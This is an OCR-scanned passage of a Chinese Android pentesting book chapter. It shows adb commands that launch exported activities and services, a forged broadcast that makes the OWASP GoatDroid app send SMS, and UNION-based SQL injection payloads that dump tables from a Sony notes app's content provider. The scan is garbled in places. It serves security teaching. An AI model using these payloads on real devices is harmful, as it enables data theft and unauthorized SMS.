O adb shell: 获取 设备 上 的 一 个 shell; 
Oam: activity 管 理工 具 ; 

O start: 启动 一 个 组 件 ; 

口 -n: 指定 要 启动 的 组 件 。 


上 述 命令 使 用 内 置 的 am 工具 来 启动 特定 的 activity， 下 图 显示 我 们 已 经 成 功 绕 过 了 身份 认证 。 




















QA Profile 


Last Checkin 


Request As Friend 


View Checkin History 





获取 关于 adb shell 命 令 的 信息 ， 请 参考 下 面 的 链接 : http://developer.android. 
com/ tools/help/shell.html。 








将 anaroid:exporteq 的 属性 值 设 为 false， 可 以 解决 这 个 问题 ， 如 下 所 示 。 


<activity android:label="@string/profile" android:name=".activities. 
ViewProfile" android:exported="false" /> 


但 是 ， 如 果 由 于 某 些 原因 ,开发 人 员 想 要 导出 这 个 activity， 可 以 通过 自 定 义 权 限 来 导出 。 只 
有 拥有 这 些 权限 的 应 用 才能 调用 这 个 组 件 。 


在 上 文 介 绍 导 出 属性 时 ， 我们 曾 提 到 还 有 男 一 种 可 能 的 方法 能 够 导出 activity， 即 Intent 
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2. Intent 过 滤器 

















Intent 过 滤器 指定 了 哪 一 种 Intent 可 以 启动 应 用 组 件 。 我 们 可 以 通过 使 用 Intent 过 滤器 添加 特殊 
条 件 来 启动 一 个 组 件 。Intent 过 滤器 能 够 启动 组 件 来 接收 指定 类 型 的 Intent， 同 时 过 滤 掉 对 组 件 无 











意义 的 Intent。 许 多 开发 人 员 所 


Lu. 











Intent 过 滤器 当 作 一 种 安全 机 制 。 事 实 上 ，Intent 过 滤器 不 应 被 当 作 











一 种 用 来 保护 组 件 的 安全 机 制 。 如 果 你 使 用 了 Intent 过 滤器 ， 请 记 住 组 件 的 默认 导出 属性 。 
下 面 的 示例 代码 展示 了 Intent 过 滤器 。 


<activity android: label="@string/apic_label" 
android:name="com.androidpentesting.PrivateActivity"> 


<Intent-filter> 





<action android:name="com.androidpentesting.action.LaunchPrivateActivity"/> 


<category android:name="android.Intent.category.DEFAULT"/> 


</Intent-filter> 


</activity> 


从 上 述 示 例 代 码 中 可 以 看 到 , 在 <Intent-filter> 标 签 中 声明 了 一 个 action 元 素 。 要 想 顺 
利通 过 这 个 过 滤器 ，Intent 中 用 于 启动 应 用 的 action 需 要 与 声明 的 action 匹 配 。 如 果 局 动 Intent 
时 不 指定 任何 过 滤器 ， 它 仍然 能 运行 。 








这 意味 着 下 面 的 命令 可 以 启动 上 面 代 码 中 私有 的 activity。 


Intent without any action element. 


am start -n com.androidpentesting/.PrivateActivity 


Intent with action element. 


am start -n com.androidpentesting/.PrivateActivity -a com. 
androidpentesting.action.LaunchPrivateActivity 


在 所 有 运行 安 草 4.3 或 以 前 版 本 的 设备 中 ， 都 存在 针对 默认 设置 应 用 的 攻击 
漏洞 ， 用 户 可 以 通过 该 漏洞 在 未 ROOT 的 设备 上 绕 过 锁 屏 界面 。 在 第 9 章 中 ， 我 


们 会 对 此 进行 讨 


7.1.2 ”针对 服务 的 攻击 


论 。 








安 卓 应 用 中 的 服务 通常 月 

















于 在 














百 台 处 理 长 时 间 和 运行 的 任务 。 虽 然 这 是 服务 最 常见 的 用 法 ,而 
且 大 部 分 面向 初学 者 的 博客 也 是 这 样 介 绍 的 。 但 是 , 还 存在 一 些 其 他 类 型 的 服务 ,它们 能 为 设备 


上 的 其 他 应 用 或 同一 应 用 的 其 他 组 件 提供 接口 。 所 以 ,服务 基本 上 可 以 分 为 两 种 ， 启动 和 绑 定 。 




















152 第 7 章 PH 











SA 








我 们 可 以 使 用 startservice() 来 启动 服务 。 服 务 启动 后 , 会 在 后 台 不 停 地 运行 ， 即 使 启动 
该 服务 的 组 件 已 经 销毁 。 


也 可 以 使 用 pindaservice () 来 绑 定 服务 ， 绑 定 服务 提供 了 一 个 从 客户 端 到 服务 顺 的 接口 ， 
能 够 让 组 件 与 服务 进行 交互 、 发 送 请 求 、 获 取 结 果 , 甚至 可 以 通过 进程 间 通 信 在 不 同 的 进程 上 实 
现 这 些 功 能 


可 以 通过 下 面 三 种 方法 创建 绑 定 服务 。 
1. 扩展 Binder 类 


如 果 开 发 人 员 想 要 在 同一 个 应 用 中 调用 某 个 服务 ,建议 使 用 这 种 方法 。 这样 , 设备 上 的 其 他 
应 用 就 不 能 调用 这 个 服务 。 


具体 方法 是 , 扩展 Bindaer 类 来 创建 一 个 接口 , 并 从 onBina () 返回 一 个 关于 它 的 实例 。 客 户 
端 接收 到 Binger 后 ， 可 以 通过 它 直 接 访问 该 服务 中 的 公共 方法 。 








HE 

































































2. 使 用 Messenger 


如 果 需 要 跨 进 程 使 用 接口 , 可 以 使 用 Messenger 为 服务 创建 一 个 接口 。 通过 这 种 方式 创建 的 
服务 可 以 定义 Handler, 而 且 Handler 能 够 响应 不 同类 型 的 Message 对 象 。 RE, 客户 端 可 以 使 
用 Message 对 象 向 服务 发 送 命 令 。 


3. 使 用 AIDL 
AIDL 是 一 种 允许 一 个 应 用 调用 男 一 个 应 用 的 方法 。 


与 activity 类 似 , 一 个 未 受 保护 的 服务 也 可 以 被 设备 上 其 他 应 用 调用 。 使 用 startService () 
就 可 以 调用 第 一 种 服务 ,方法 通俗 易 懂 ， 我 们 通过 adb 命 令 也 可 以 调用 第 一 种 服务 。 


同样 ， 可 以 使 用 GoatDroid 应 用 来 演示 如 何 调用 应 用 导出 的 服务 。 


下 面 是 GoatDroid 应 用 中 AndroidManifestxml 文 件 的 一 段 代 码 ， 由 于 使 用 了 Intent 过 滤器 ， 所 
以 服务 是 导出 的 。 















































<service android:name=".services.LocationService"> 
<Intent-filter> 
<action 
android:name="org.owasp.goatdroid.fourgoats. 
services.LocationService" /> 


</Intent-filter> 


</service> 
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我 们 可 以 通过 对 am 工具 指定 startservice 选 项 来 调用 这 个 服务 ， 如 下 所 示 。 


adb shell am startservice -n org.owasp.goatdroid.fourgoats/.services. 
LocationService -a org.owasp.goatdroid.fourgoats.services.LocationService 


4. 攻击 AIDL 服 务 


在 现实 生活 中 ， 对 AIDEL 的 实现 十 分 少见 。 如 果 你 对 如 何 测试 和 利用 这 种 服务 感 兴趣 ， 可 以 
阅读 下 面 的 博客 : http://blog.thecobraden.com/2015/12/attacking-bound-services-on-android.html?m=1 > 


7.1.3 ”针对 广播 接收 器 的 攻击 


广播 接收 器 是 安 卓 系统 中 最 常用 的 组 件 之 一 ， 开 发 人 员 可 以 利用 广播 接收 咒 来 添加 很 多 
功能 。 


导出 的 广播 接收 器 容易 受到 攻击 。 我 们 使 用 GoatDroid 应 用 来 演示 攻击 者 是 如 何 利用 广播 接 
收 顷 漏洞 的 。 


下 面 是 GoatDroid 应 用 AndroidManifest.xml 文 件 中 的 一 段 代码 , 其 中 显示 它 有 一 个 已 经 注册 过 
FYFE o 


<receiver android:label="Send SMS" 
android:name=".broadcastreceivers.SendSMSNowReceiver"> 
<Intent-filter> 
<action 
android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" /> 
</Intent-filter>> 
</receiver> 


通过 研究 它 的 源 代 码 ， 我 们 发 现 应 用 具有 如 下 的 功能 。 














public void onReceive (Context arg0, Intent argl) { 
context = arg0; 
SmsManager sms = SmsManager.getDefault(); 
Bundle bundle = argl.getExtras(); 
sms.sendTextMessage (bundle.getString("phoneNumber") ,null, 
bundle.getString("message"), null, null); 
Utils.makeToast (context, Constants.TEXT_MESSAGE_SENT, 
Toast .LENGTH_LONG) ; 
} 


它 可 以 接收 广播 ， 然 后 根据 接 接 收 到 的 广播 发 送 短信 。 同 时 ,， 它 还 会 收 到 短信 和 要 发 送 短信 
的 号 码 。 要 想 实 现 这 一 功能 ， 需 要 在 AndroidManifestxml 文 件 中 注册 SEND_SMS 权 限 。 在 
AndroidManifestxml 文 件 中 ， 我 们 可 以 看 到 如 下 的 代码 ， 确 认 该 应 用 注册 了 SEND_SMS 权 限 。 





<uses-permission android:name="android.permission.SEND_SMS" /> 
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R 下 载 代码 包 的 详细 步骤 请 参考 本 书 的 前 言 部 分 。 也 可 以 从 GitHub 中 下 载 代 码 
Q E, PA E> https://github.com/PacktPublishing/hacking-android, https://github.com/ 
PacktPublishing/ 页 面 中 ， 还 有 更 多 的 图 书 和 视频 中 的 代码 包 。 快 去 了 解 一 下 吧 ! 





这 个 应 用 无 法 检测 是 谁 发 送 了 广播 事件 。 攻击 者 可 以 利用 这 一 点 , 并 使 用 下 面 的 命令 来 创建 
一 个 特殊 的 Intent。 

adb shell am broadcast -a org.owasp.goatdroid.fourgoats.SOCIAL_SMS 

-n org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats/. 


broadcastreceivers.SendSMSNowReceiver -es phoneNumber 5556 -es message 
CRACKED 


我 们 来 详细 解释 上 述 的 命令 。 
口 am broadcast: 发 送 广播 请 求 ; 
口 -a: 指定 action 元 素 ; 
口 -n: 指定 组 件 名 称 ; 
口 -es: 指定 字符 串 键 值 对 的 其 他 名 称 。 
现在 运行 这 个 命令 ， 看 看 会 发 生 人 什么。 该 应 用 没有 在 前 台 运 行 ， 用 户 也 没有 使 用 GoatDroid 
应 用 ， 如 下 图 所 示 。 
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在 终端 上 运行 这 个 命令 ， 模 拟 器 上 会 弹出 下 面 的 提示 。 


Your text message has been sent! 


A a Eg 
oe = 
~— = 
a oF 


可 以 看 到 ,在 用 户 没 进行 任何 操作 的 情况 下 , 设备 发 出 了 一 条 短信 。 但是， 如 果 应 用 运行 在 
安 卓 4.2 及 以 上 的 系统 中 ， 则 会 弹出 下 图 中 的 提示 信息 。 


























FourGoats would like to send a message to 5556 


2 This may cause charges on your mo 











注意 ,弹出 这 个 警告 信息 是 因为 短信 被 发 送 给 了 一 个 短 号 码 ,在 本 例 中 即 5556， 而 不 是 为 了 
阻止 广播 Intent。 如 果 触 发 的 是 某 个 功能 而 不 是 发 送 短信 ， 用 户 就 不 会 看 到 这 类 和 警告。 























7.1.4 对 内 容 提供 程序 的 攻击 


本 节 将 讨论 针对 内 容 提 供 程 序 的 攻击 。 与 前 面 讨论 过 的 其 他 应 用 组 件 类 似 , 导出 的 内 容 提供 
程序 也 能 被 滥用 。 如 果 应 用 的 目标 SDK 版 本 号 是 API17， 那么 内 容 提 供 程 序 默认 是 导出 的 。 这 意 
味 着 如 果 我 们 不 在 AndroidManifest.xml 文 件 中 显 式 地 指定 exported=false， 内 容 提供 程序 默认 
就 是 导出 的 。 从 API17 开 始 ， 这 个 默认 值 就 改变 了 ， 而 且 默 认 值 变 成 了 false。 此 外 ， 如 果 应 用 导 
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出 了 内 容 提供 程序 ， 我 们 可 以 像 使 用 前 面 的 其 他 组 件 一 样 来 使 用 它 


接 下 来 ， 我 们 将 介绍 内 容 提 供 程序 中 的 一 些 问 题 ， 并 通过 一 个 真实 的 应 用 来 研究 这 些 问题 
我 们 使 用 索尼 Xperia 手 机 自 带 的 记事 本 应 用 。 我 发 现 了 索尼 记事 本 应 用 的 漏洞 ， 并 把 它 提 供给 AR 
尼 公司 。 这 个 应 用 已 经 不 再 被 使 用 。 

下 面 是 关于 这 个 应 用 的 详细 信息 : 


口 软件 版 本 号 : 1.C.6 


O 41%: com.sonyericsson.notes 
索尼 设备 已 经 删除 了 这 个 应 用 (在 安 卓 4.1.1 版 本 的 C1504 手 机 和 C1505 手 机 中 有 这 个 应 用 )。 


与 我 们 对 GoatDroid 应 用 所 做 的 工作 一 样 , 首先 获取 目标 应 用 的 AndroidManifestxml 文 件 。 经 
查找 ， 我 们 在 AndroidManifest.xml 文 件 中 找到 了 下 面 的 代码 。 






























































<provider android:name=".NoteProvider" android:authorities="com. 
sonyericsson.notes.provider.Note" /> 


注意 ， 这 段 代码 中 没有 android:exported=true 条 有 目 。 但是， 由 于 API 级 别 是 16， 所 以 这 
个 内 容 提 供 程序 是 导出 的 。 在 APKTOOL 生 成 的 AndroidManifest.xml 文 件 中 没有 最 低 SDK 版 本 条 
A, 但 是 我 们 可 以 使 用 其 他 方法 找到 它 。 方 法 之 一 是 ,使 用 Drozer， 通 过 运行 命令 转 储 应 用 的 
AndroidManifest.xml 文 件 。 我 们 将 在 本 章 下 一 节 中 给 出 具体 的 方法 。 


之 前 提 到 ， 这 个 应 用 是 从 一 台 运行 安 卓 4.1.1 系 统 的 设备 中 获取 的 。 这 意味 着 应 用 所 使 用 的 
SDK 版 本 可 能 支持 具有 安 卓 4.1.1 以 下 系统 的 设备 。 下 图 显示 了 安 卓 系 统 版 本 及 其 对 应 的 API 级 别 。 





















































KITKAT Platform Highlights 


JELLY_BEAN_MR2 Platform Highlights 


JELLY_BEAN Platform Highlights 





Android 4.0.3, 4.0.4 ICE_CREAM_SANDWICH_MR1 Platform Highlights 








1 
1 
Android 4.2, 4.2.2 17 JELLY_BEAN_MR1 Platform Highlights 
1 
1 
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Android 4.0, 4.0.1, 4.0.2 ICE_CREAM_SANDWICH 








适用 于 安 卓 4.1.1 系 统 的 应 用 的 最 大 API 级 别 可 能 为 16。 由 于 当 API 级 别 低 于 17 时 ， 内 容 提 供 
程序 默认 是 导出 的 ， 我 们 可 以 确认 这 个 内 容 提供 程序 是 导出 的 。 














"14"targetSdkVersion="15">， 可 以 在 第 8 章 查 看 相关 信息 。 





[= 通过 Drozer 确 认 了 这 个 应 用 有 如 下 属性 : <uses-sdk minSdkVersion= 


我 们 来 看 一 下 如 何 利 用 导出 的 内 容 提供 程序 
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1. 查询 内 容 提 供 程序 


如 果 内 容 提供 程序 是 导出 的 , 我 们 可 以 对 它 进行 查询 并 读 取 其 中 的 内 容 , 也 可 以 插入 或 删除 





























内 容 。 但 是 , 在 此 之 前 , 我 们 需要 首先 要 找 出 内 容 提供 程序 的 URI。 使 用 Apktool 分 解 APK 文 件 时 ， 
它 会 在 smali 文 件 夹 中 生成 一 些 .smali 文 件 。 























下 面 是 我 使 用 APKTOOL 分 解 应 用 后 生成 的 文件 夹 结 构 。 








/outputdir/smali/com/sonyericsson/notes/*.smali 
我 们 可 以 使 用 grep 命 令 进 行 递归 搜索 ， 查 找 包 含 "content ://" 的 字符 串 ， 如 下 所 示 。 


$ grep -lr "content://" * 
Note$NoteAccount.smali 
NoteProvider.smali 


$ 
从 上 上 面 的 代码 中 可 以 看 到 ，grep 命 令 在 两 个 不 同 的 文件 中 找到 了 "content ://" FB. TE 








NoteProvidersmali 文 件 中 搜索 "content ://" 会 显示 如 下 信息 。 


.line 37 

const-string v0, "content://com.sonyericsson.notrs.provider.Notes/notes" 
invoke-static {v0}, Landroid/net/Uri;->parse(Ljava/lang/String; ) 
Landroid/net/Uri; 


move-result-object v0 

sput-object v0, Lcom/sonyericsson/notes/NoteProvider ; ->CONTENT_URI:Landroid/net/Uri; 
.line 54 

const/16 v0,0xe 


可 以 看 到 内 容 提供 程序 的 URI， 如 下 所 示 。 





content://com.sonyericsson.notes.provider.Note/notes/ 
接 下 来 ， 根 据 上 面 的 URI 读 取 内 容 就 很 简单 了 ， 只 需 执行 下 面 的 命令 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ 


安 卓 4.1.1 系 统 开始 使 用 了 content 命 令 。 这 实际 上 是 存放 在 /systemy/bin/content 下 的 一 个 脚 
可 以 利用 它 通过 aab shell 直 接 读 取 内 容 提 供 程序 。 


按照 下 面 的 方法 运行 前 面 的 命令 ， 可 以 读 取 内 容 提供 程序 数据 库 的 内 容 。 









































$ adb shell content query --uri content://com.sonyericsson.notes. 
provider .Note/notes/ 


Row: 0 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_path=, deleted=0, 
modified=1062246014, sync_uid=NULL, title=No title, 

meta_info= 

false 

0, _id=1, created=1062246014, background=com.sonyericsson.notes:drawable/ 
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notes_background_grid_view_1, usn=0 

Row: 1 isdirty=1, body=test note_2, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062253793, sync_uid=NULL, title=No title, 
meta_info= 

false 

0, _id=2, created=1062253793, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 


$ 


从 前 面 的 输出 中 可 以 看 到 ， 一 共 显 示 了 两 行 ， 每 行 14 列 。 为 了 使 输出 更 加 清晰 ， 提 取出 的 这 
14 列 名 字 ， 如 下 所 示 。 








QO) Isdirty 

O body 

Q) account_id 
D voice_path 
D doodle_path 
ü deleted 

D modified 

ü sync_uid 

ü title 

口 meta_info 
Oh id 

ü created 

O background 

















D usn 
你 可 以 把 这 与 应 用 中 的 实际 数据 对 比 一 下 。 





No title No title 


test test 
note_1 Inote_2 




















2. 通过 aab 对 内 容 提供 程序 进行 SQL 注入 


内 容 提供 程序 通常 是 基于 SQLite 数 据 库 的 。 如 果 输 入 数据 库 的 命令 没 经 过 合适 的 处 理 ， 就 会 
发 生 与 Web 应 用 相同 的 SQL 注入 的 情形 。 下 面 的 例子 使 用 了 上 文中 的 记事 本 应 用 。 
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@ 查询 内 容 提 供 程序 
首先 ， 再 一 次 查询 内 容 提 供 程序 的 notes 表 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ 


Row: 0 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062246014, sync_uid=NULL, title=No title, 
meta_info= 

false 

0, _id=1, created=1062246014, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 

Row: 1 isdirty=1, body=test note_2, account_id=1, voice_path=, doodle_path=, deleted=0, 
modified=1062253793, sync_uid=NULL, title=No title, 

meta_info= 

false 

0, _id=2, created=1062253793, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 


$ 


这 是 我 们 在 前 面 已 经 看 过 的 输出 。 前 面 的 查询 命令 检索 了 notes 表 中 所 有 的 行 , 每 一 行 都 指向 
一 个 保存 在 应 用 中 的 真实 笔记 。 








No title No title 
‘test test 








[ee note. 














使 用 类 似 下 面 的 SQL 查 询 语句 也 能 进行 之 前 的 查询 操作 。 


select * from notes; 
o 编写 一 个 where 条 件 


现在 ， 使 用 where 子 句 编写 一 个 条 件 ， 使 其 只 取 一 行 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1" 


从 上 面 的 命令 中 可 以 看 到 ， 我 们 添加 了 一 个 简单 的 where 子 句 来 过 滤 数 据 。 列 名 “id” Zé 
从 前 面 使 用 aqpb 命 令 对 内 容 提供 和 中 找到 的 。 


上 述 命令 的 输出 内 容 如 下 所 示 。 
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$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1" 


Row: 0 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062246014, sync_uid=NULL, title=No title, 
meta_info= 

false 

0, _id=1, created=1062246014, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 


$ 











如 果 仔 细 观 察 上 述 的 输出 ， 就 会 发 现 只 显示 了 一 行 。 使 用 类 似 下 面 的 SQL 查询 语句 也 可 以 完 


成 前 面 的 查询 。 


select * from notes where _id=1; 


7.1.5 注入 测试 




















如 果 你 拥有 传统 Web 应 用 渗透 测试 的 背景 ， 你 可 能 会 注意 到 ， 单 引号 是 SQL 注入 测试 中 最 常 


用 的 字符 。 我 们 尝试 在 where 子 名 传递 的 字符 串 中 添加 一 个 单 引 号 。 
现在 命令 看 起 来 如 下 所 示 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1'" 


我 们 想 要 测试 单 引号 是 否 会 导致 数据 库 执行 SQL 查 询 语句 时 报 语法 错误 。 如 果 会 ,就 
外 部 输入 没有 经 过 合适 的 验证 ， 那 么 应 用 可 能 存在 注入 漏洞 。 
使 用 前 面 的 命令 输出 以 下 内 容 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1'" 











Error while accessing provider:com.sonyericsson.notes.provider.Note 
android.database.sqlite.SQLiteException: unrecognized token: "')" (code 
1): , while compiling: SELECT isdirty, body, account_id, voice_path, 
doodle_path, deleted, modified, sync_uid, title, meta_info, _id, created, 
background, usn FROM notes WHERE (_id=1') 

at android.database.DatabaseUtils.readExceptionFromParcel (DatabaseUti 
ls.java:181) 

at android.database.DatabaseUtils.readExceptionFromParcel (DatabaseUti 
ls.java:137) 

at android.content.ContentProviderProxy.query (ContentProviderNative. 
java:413) 

at com.android.commands.content.Content$QueryCommand.onExecute (Content. 
java:474) 

at com.android.commands.content.Content$Command.execute(Content. 
java:381) 

at com.android.commands.content.Content.main(Content.java:544) 


we 
= 
soy 


味 着 
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at com.android.internal.os.RuntimeInit .nativeFinishInit (Native Method) 
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:243) 
at dalvik.system.NativeStart.main(Native Method) 


$ 
EL ae 


从 上 面 的 输出 中 可 以 看 到 ， 抛 出 了 一 个 SQLite 异 常 。 仔 细 观 察 会 发 现 ， 这 个 异常 是 由 单 引号 
导致 的 。 


unrecognized token: "')" (code 1): , while compiling: SELECT isdirty, 
body, account_id, voice_path, doodle path, deleted, modified, sync_ 
uid, title, meta_info, _id, created, background, usn FROM notes WHERE 


(_id=1') 

上 面 的 错误 信息 同时 显示 了 查询 语句 所 用 到 的 精确 列 号 , 即 第 十 四 列 。 这 对 进一步 编写 使 用 
UNION 操 作 符 的 查询 语句 很 有 用 。 

1. 查找 用 于 提取 信息 的 所 有 列 号 


与 Web 数 据 库 注入 类 似 , 现在 执行 一 条 包含 UNION 操 作 符 的 SELECT 语句 ,查看 输出 的 所 有 列 。 
由 于 我 们 直接 在 终端 执行 该 语句 ， 所 以 它 会 输出 所 有 十 四 列 的 数据 。 我 们 来 测试 一 下 。 



























































运行 下 面 的 命令 会 打印 所 有 从 1 开始 的 十 四 个 数字 。 


$ adb shell content query --uri content://com.sonyericsson. 
notes.provider.Note/notes/ --where "_id=1 ) union select 
1,2,3,4,5,6,7,8,9,10,11,12,13,14-- (" 

















这 条 命令 是 如 何 运行 的 ? 
首先 , 看 一 下 之 前 得 到 的 错误 提示 ,有 一 个 括号 是 打开 的 , 单 引号 位 于 后 半 个 括号 之 前 ， 从 
而 导致 一 个 错误 ， 如 下 所 示 。 





WHERE (_id=1') 
因此 ， 首 先 关 闭 插 号 ， 然 后 编写 select 查 询 语句 ， 最 后 注释 掉 查 询 语 句 后 面 的 全 部 内 容 。 
现在 前 面 的 where 子 句 变 成 了 下 面 的 样子 。 


WHERE (_id=1) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14— 


然后 ， 这 十 四 列 应 该 与 现 有 的 SELECT 语句 中 的 列 号 相 匹配 。 编 写 包 含 uNION 操 作 符 的 
SELECT 语句 时 ， 两 个 语句 中 的 列 号 应 该 是 相同 的 。 这 样 前 面 的 查询 就 会 在 句法 上 和 现 有 查询 语 
名 匹配 ， 而 且 不 会 报 任何 错 。 

运行 前 面 的 命令 会 输出 下 面 的 结 

$ adb shell content query --uri content://com.sonyericsson. 


notes.provider.Note/notes/ --where "_id=1 ) union select 
dy 2, Sy Ay 5, by 77 87 9y 10, 11,12, 13, 14-—. (" 
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Row: 0 isdirty=1, body=2, account_id=3, voice path=4, doodle path=5, 


deleted=6, 


modified=7, sync_uid=8, title=9, meta_info=10, _id=11, 


created=12, background=13, usn=14 


Row: 1 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062246014, sync_uid=NULL, title=No title, 
meta_info= 


false 
0, _id=1, 


created=1062246014, background=com.sonyericsson.notes:drawable/ 


notes_background_grid_view_1, usn=0 


$ 








从 上 面 的 输出 结果 中 可 以 看 出 ， 两 种 数据 库 查 询 语句 都 显示 了 这 十 四 个 数字 。 
. 运行 数据 库 函 数 








对 前 面 的 查询 语句 进行 简单 的 修改 , 我 们 可 以 提取 出 更 多 的 信息 ， 如 数据 库 版 本 号 、 表 名 以 
及 其 他 有 趣 的 信息 /GO 


3. 查找 SQLite 版 本 号 
运行 salite_version() 国 数 会 显示 SQLite 的 版 本 信息 ， 如 下 图 所 示 。 





srini's MacBook:~ sriniðxðð$ sqlite3 

SQLite version 3.8.5 2014-@8-15 22:37:57 
Enter ".help" for usage hints. 

Connected to a transient in-memory database. 
Use ".open FILENAME" to reopen on a persistent database. 
sqlite> 

sqlite> 

sqlite> 

sqlite> select sqlite_version(); 

3.8.5 

sqlite> J 




















ne 以 在 查询 语句 中 使 用 这 个 函数 来 查看 有 漏洞 的 应 用 的 SQLite 版 本 。 使 用 下 面 的 命令 做 


到 这 一 点 fe} 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1 ) union select 1,2,3,4,sqlite_ 


version() 


,6,7,8,9,10,11,12,13,14-- (" 





KES PR Msqlite_version() RM. TE, PIIRRE ES, AEN 


都 会 返回 输出 。 


运行 上 面 的 命令 ,会 显示 SQLite 的 版 本 信息 ， 如 下 所 示 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1 ) union select 1,2,3,4,sqlite_ 


version() 


,6,7,8,9,10,11,12,13,14-- (" 


Row: 0 isdirty=1, body=2, account_id=3, voice_path=4, doodle_path=3.7.11, 
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deleted=6, modified=7, sync_uid=8, title=9, meta_info=10, _id=11, 
created=12, background=13, usn=14 


Row: 1 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062246014, sync_uid=NULL, title=No title, 
meta_info= 

false 

0, _id=1, created=1062246014, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 


$ 
从 前 面 的 代码 中 可 以 看 出 ， 安 装 的 SQLite 数 据 库 的 版 本 号 为 3.7.11。 


4. ERRE 


想 要 检索 出 表 名 ， 可 以 将 前 面 查询 语句 中 的 sqlite_version () 和 替换 成 tbl_name。 此 外 ， 
我 们 还 需要 从 salite_master 数 据 库 中 查询 表 名 。sqlite_master 类 似 于 MySQL 数 据 库 中 的 
information_ schema。 它 保存 了 数据 库 的 元 数据 和 结构 。 


修改 后 的 查询 语句 如 下 所 示 。 


$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1 ) union select 1,2,3,4,tbl_ 
name,6,7,8,9,10,11,12,13,14 from sqlite_master-- (" 


运行 上 述 命令 ， 将 会 显示 出 表 名 ， 如 下 所 示 。 











$ adb shell content query --uri content://com.sonyericsson.notes. 
provider.Note/notes/ --where "_id=1 ) union select 1,2,3,4,tbl_ 
name,6,7,8,9,10,11,12,13,14 from sqlite _master-- (" 


Row: 0 isdirty=1, body=2, account_id=3, voice_path=4, doodle_ 
path=accounts, deleted=6, modified=7, sync_uid=8, title=9, meta_info=10, 
_id=11, created=12, background=13, usn=14 





Row: 1 isdirty=1, body=2, account_id=3, voice_path=4, doodle_ 
path=android_metadata, deleted=6, modified=7, sync_uid=8, title=9, meta_ 
info=10, _id=11, created=12, background=13, usn=14 


Row: 2 isdirty=1, body=2, account_id=3, voice_path=4, doodle _path=notes, 
deleted=6, modified=7, sync_uid=8, title=9, meta_info=10, _id=11, 
created=12, background=13, usn=14 


Row: 3 isdirty=1, body=test note_1, account_id=1, voice_path=, doodle_ 
path=, deleted=0, modified=1062246014, sync_uid=NULL, title=No title, 
meta_info= 

false 

0, _id=1, created=1062246014, background=com.sonyericsson.notes:drawable/ 
notes_background_grid_view_1, usn=0 


$ 
从 上 面 的 代码 中 可 以 看 出 ， 一 共 检 索 出 这 三 个 表 。 





ay 


( 


Yy 
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QO) accounts 


ü android_metadata 





OU notes 


类 似 地 ， 我 们 还 可 以 对 有 漏洞 的 应 用 运行 任意 的 SQLite 命 令 ， 并 从 数据 库 中 提取 数据 。 





7.2 ”使 用 QARK 进行 静态 分 析 


QARK 是 男 一 种 有 趣 的 命令 行 工 具 ， 能够 对 安 卓 应 用 进行 静态 分 析 ， 可 以 使 用 多 种 工具 来 反 
编译 APK 文 件 ， 然 后 按照 特定 的 模式 对 源 代码 进行 分 析 。 


QARK 由 领 英 安全 团队 开发 ， 可 以 从 下 面 的 链接 下 载 : https://github.com/linkedin/qark。 
第 1 章 介绍 了 安装 QARK 的 方法 ， 现 在 介绍 如 何 使 用 QARK 对 安 卓 应 用 进行 静态 分 析 。 
QARK 有 以 下 两 种 工作 模式 : 


口 交互 模式 
口 无 颖 模式 


运行 下 面 的 命令 ， 可 以 启动 QARK 的 交互 模式 。 












































python qark.py 


运行 上 述 命令 ， 启 动 QARK 的 交互 模式 ， 如 下 图 所 示 。 








.d88888b. d8888 8888888b. 888 d8P 
d88P" "Y88b d88888 888 Y88b 888 d8P 
888 888 d88P888 888 888 888 d8P 
888 888 d88P 888 888 d88P 888d88K 
888 888 d88P 888 8888888P" 8888888b 
888 Y8b 888 d88P 888 888 T88b 888 Y88b 
Y88b.Y8b88P d8888888888 888 T88b 888 Y88b 

"Y888888" d88P 888 888 T88b 888 Y88b 

Y8b 
Do you wa e 
[1] APK 
[2] Sou 
Er r I ce: 











从 上 图 中 可 以 看 出 ， 使 用 QARK 既 可 以 分 析 APK 文 件 进行 分 析 ， 也 可 以 分 析 源 代码 。 现 在 ， 
选择 选项 1 来 分 析 APK 文 件 ， 然 后 选择 APK 文 件 的 路 径 ， 如 下 图 所 示 。 
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Do you want to examine: 

[1] APK 

[2] Source 

Enter your choice:1 

Do you want to: 

[1] Provide a path to an APK 

[2] Pull an existing APK from the device? 


Enter your choice:1 


Please enter the full path to your APK (ex. /foo/bar/pineapple.apk): 
Path: /Users/srini®éx66/Downloads/qark-—master/sonynotes.apk 


上 图 显示 了 前 文中 索尼 记事 本 应 用 的 存储 路 径 。 按 回 车 键 ， 根 据 屏 幕 提 示 开 始 分 析 应 
下 图 显示 了 QARK 从 目标 应 用 检索 出 的 AndroidManifest.xml 文 件 。 














Inspect Manifest?[y/n]y 


<uses-sdk android:minSdkVersion="14" android: targetSdkVersion="15"> 
</uses-sdk> 

